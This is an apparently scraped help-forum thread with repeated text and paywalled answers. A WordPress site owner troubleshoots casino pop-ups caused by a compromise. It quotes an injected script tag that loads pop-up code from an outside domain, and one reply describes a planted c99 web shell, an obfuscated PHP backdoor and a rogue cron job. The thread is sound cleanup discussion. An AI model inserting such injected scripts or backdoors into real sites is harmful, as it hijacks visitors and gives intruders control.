asked on
wordpress web site plagued with pop ups
Hello
I have a web site hosted on www.1&1.co.uk using wordpress but recently have noticed when i go to the site it is plagued with casino page pop up advertisements.
you go to the site and 4 other pages open up for casino games.
is this a problem with the site on wordpress or with the domain name hosted with 1&1?
desperately need some help with this issue
thank you
I have a web site hosted on www.1&1.co.uk using wordpress but recently have noticed when i go to the site it is plagued with casino page pop up advertisements.
you go to the site and 4 other pages open up for casino games.
is this a problem with the site on wordpress or with the domain name hosted with 1&1?
desperately need some help with this issue
thank you
Web BrowsersWeb Development
Last Comment
Beyond_Hideki
ASKER
hello
yes there are three plug ins installed
add logo to admin
formidable
options framework
also i have gone onto the web site using firefox and used the "view page source" option and have found these lines of code at the very bottom
</body>
</html><script language="javascript" src="http://www.777seo.com/pop.php?username=empixcrew&max=5"></script>
<noscript><a href="http://www.paid-to-promote.net/" target="_blank">Paid To Popup</a></noscript>
i imagine this is def what is causing the problem but not sure how i can go about removing it.
thank you for any more help
yes there are three plug ins installed
add logo to admin
formidable
options framework
also i have gone onto the web site using firefox and used the "view page source" option and have found these lines of code at the very bottom
</body>
</html><script language="javascript" src="http://www.777seo.com/pop.php?username=empixcrew&max=5"></script>
<noscript><a href="http://www.paid-to-promote.net/" target="_blank">Paid To Popup</a></noscript>
i imagine this is def what is causing the problem but not sure how i can go about removing it.
thank you for any more help
ASKER CERTIFIED SOLUTION
THIS SOLUTION ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
ASKER
hello
thank you or your help
just to explain i have access to edit the wordpress site but do not have access to the domain.
the code does not appear at all when looking through every file on wordpress but as said is clearly on the html for the site.
would this be a case of contacting the guy who hosts the site and asking him to log on to the domain host and delete the offending code?
will it just be the same HTML code on the web page source but hosted on a server? is it a simple job to edit it out?
thank you or your help
just to explain i have access to edit the wordpress site but do not have access to the domain.
the code does not appear at all when looking through every file on wordpress but as said is clearly on the html for the site.
would this be a case of contacting the guy who hosts the site and asking him to log on to the domain host and delete the offending code?
will it just be the same HTML code on the web page source but hosted on a server? is it a simple job to edit it out?
just to explain i have access to edit the wordpress site but do not have access to the domain
When you say you have access to edit but not access to the domain does this mean that you can access the site through the wordpress editor but not directly access the site itself? i.e. you do not have direct ftp/webdav access to the site?
You need to be able to go through every source file on the site. and every plugin and all of the script files. If you have a backup of the site, then restoring from a backup is probably quicker.
When you say you have access to edit but not access to the domain does this mean that you can access the site through the wordpress editor but not directly access the site itself? i.e. you do not have direct ftp/webdav access to the site?
You need to be able to go through every source file on the site. and every plugin and all of the script files. If you have a backup of the site, then restoring from a backup is probably quicker.
SOLUTION
THIS SOLUTION ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
SOLUTION
THIS SOLUTION ONLY AVAILABLE TO MEMBERS.
View this solution by signing up for a free trial.
Members can start a 7-Day free trial and enjoy unlimited access to the platform.
ASKER
hello
thank you for your help
I managed to get in contact with the guy who currently hosts the site and he has helped remove the code.
he seems to think it was a virus in a picture that was uploaded but i think that he is just trying to cover his back as he is supposed to keep it all up to date.
anyway removing the code and updating wordpress to the latest version has stop the pop up ads.
thank you for your help
I managed to get in contact with the guy who currently hosts the site and he has helped remove the code.
he seems to think it was a virus in a picture that was uploaded but i think that he is just trying to cover his back as he is supposed to keep it all up to date.
anyway removing the code and updating wordpress to the latest version has stop the pop up ads.
It wasn't the picture it was a vulnerability in WordPress.. Twit.tv also got hit with the same problem.Check this page as this is still going on.
I checked my site again today, but unfortunately, the script still gets injected, even though I had upgraded to the latest version of WP.
I then decided to check again my file manager, and examine the wordpress files. You can also do so by using this link http://codex.wordpress.org/WordPress_Files as reference.
I noticed 2 files which are not really WP files. Namely:
wp-ok.php
wp-link.php
at first, I didnt think that these were such malicious php files. checking whats inside those are:
on wp-ok.php its a c99 shell.
on wp-link.php its an obfuscated php file that when loaded, a password protected page will show. just like the image attached.
![wp-link.php when accessed directly.]()
I also found out an unwanted Cron job happening on my server. it has a name of OneHeart.bot.chk --deleted that job too coz it had eaten up a lot of my hosting account's resources.
I am on the process of locating and removing all the possible malicious files or shells in my file manager. Though, the entry point of this exploit is still unclear to me.
I then decided to check again my file manager, and examine the wordpress files. You can also do so by using this link http://codex.wordpress.org/WordPress_Files as reference.
I noticed 2 files which are not really WP files. Namely:
wp-ok.php
wp-link.php
at first, I didnt think that these were such malicious php files. checking whats inside those are:
on wp-ok.php its a c99 shell.
on wp-link.php its an obfuscated php file that when loaded, a password protected page will show. just like the image attached.
I also found out an unwanted Cron job happening on my server. it has a name of OneHeart.bot.chk --deleted that job too coz it had eaten up a lot of my hosting account's resources.
I am on the process of locating and removing all the possible malicious files or shells in my file manager. Though, the entry point of this exploit is still unclear to me.
I'm not entirely sure what the problem might be without having a look at your website. Are you able to post a link?
Have you any Wordpress plugins installed on your site? If so can you list them? It might be possible one of them is causing this issue.
Matt